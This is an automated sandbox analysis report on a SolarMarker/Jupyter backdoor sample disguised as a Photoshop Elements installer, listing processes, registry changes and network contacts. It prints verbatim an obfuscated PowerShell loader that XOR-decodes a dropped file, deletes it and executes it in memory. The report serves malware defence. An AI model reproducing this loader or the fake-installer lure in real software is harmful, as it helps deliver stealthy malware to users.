Malware Analysis Report

2024-10-16 02:56

Sample ID 231202-k7pfksbb89
Target 9ed713aab05f4d8d6c3483283b23c3f7dd68d7b7d03d85a2b906f70ee9240815.zip
SHA256 9ed713aab05f4d8d6c3483283b23c3f7dd68d7b7d03d85a2b906f70ee9240815
Tags
jupyter backdoor stealer trojan upx
score
10/10

Analysis Overview

score
10/10

SHA256

9ed713aab05f4d8d6c3483283b23c3f7dd68d7b7d03d85a2b906f70ee9240815

Threat Level: Known bad

The file 9ed713aab05f4d8d6c3483283b23c3f7dd68d7b7d03d85a2b906f70ee9240815.zip was found to be: Known bad.

Malicious Activity Summary

jupyter backdoor stealer trojan upx

Jupyter, SolarMarker

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

UPX packed file

Program crash

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-02 09:15

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-02 09:14

Reported

2023-12-02 09:18

Platform

win7-20231023-en

Max time kernel

120s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\installer-bundle.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2FGQT.tmp\installer-bundle.tmp N/A

Processes

C:\Users\Admin\AppData\Local\Temp\installer-bundle.exe

"C:\Users\Admin\AppData\Local\Temp\installer-bundle.exe"

C:\Users\Admin\AppData\Local\Temp\is-2FGQT.tmp\installer-bundle.tmp

"C:\Users\Admin\AppData\Local\Temp\is-2FGQT.tmp\installer-bundle.tmp" /SL5="$40108,310535746,790016,C:\Users\Admin\AppData\Local\Temp\installer-bundle.exe"

Network

N/A

Files


Analysis: behavioral2

Detonation Overview

Submitted

2023-12-02 09:14

Reported

2023-12-02 09:18

Platform

win10v2004-20231130-en

Max time kernel

124s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\installer-bundle.exe"

Signatures

Jupyter, SolarMarker

backdoor trojan stealer jupyter

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-596315103-1488671723-776734015-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp N/A

UPX packed file

upx

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-596315103-1488671723-776734015-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Users\Admin\AppData\Local\Temp\is-UL5S8.tmp\PhotoshopElements_2024_LS30_win64.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-596315103-1488671723-776734015-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\PhotoshopElements_2024_LS30_win64.exe = "11001" C:\Users\Admin\AppData\Local\Temp\is-UL5S8.tmp\PhotoshopElements_2024_LS30_win64.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4952 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\installer-bundle.exe C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp
PID 4952 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\installer-bundle.exe C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp
PID 4952 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\installer-bundle.exe C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp
PID 2288 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2288 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2288 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2288 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp C:\Users\Admin\AppData\Local\Temp\is-UL5S8.tmp\PhotoshopElements_2024_LS30_win64.exe
PID 2288 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp C:\Users\Admin\AppData\Local\Temp\is-UL5S8.tmp\PhotoshopElements_2024_LS30_win64.exe
PID 2288 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp C:\Users\Admin\AppData\Local\Temp\is-UL5S8.tmp\PhotoshopElements_2024_LS30_win64.exe

Processes

C:\Users\Admin\AppData\Local\Temp\installer-bundle.exe

"C:\Users\Admin\AppData\Local\Temp\installer-bundle.exe"

C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp

"C:\Users\Admin\AppData\Local\Temp\is-9E33C.tmp\installer-bundle.tmp" /SL5="$4011A,310535746,790016,C:\Users\Admin\AppData\Local\Temp\installer-bundle.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -commaND "IEX([TeXt.EncOdiNG]::UtF8.GEtString((({$F=[iO.FilE]::rEAdAlLByTES($ARgS[0]);(RM $ArGs[0]);RETuRN $F}.InVOkE('C:\USERs\AdMiN\apPdAtA\lOCAL\TEMP\iS-uL5s8.tmp\..\9C70Da122628352982AB7f7a1B2038cc.Tmp'))|%{$_ -bxor 'HDOBawNjxsiQTFEXqeSdbAYUkuJotWLh'[$K++%32]})))"

C:\Users\Admin\AppData\Local\Temp\is-UL5S8.tmp\PhotoshopElements_2024_LS30_win64.exe

"C:\Users\Admin\AppData\Local\Temp\is-UL5S8.tmp\PhotoshopElements_2024_LS30_win64.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3932 -ip 3932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 2664

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | g.bing.com | udp
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
NL | 217.138.215.85:80 | | tcp
NL | 217.138.215.85:80 | | tcp

Files
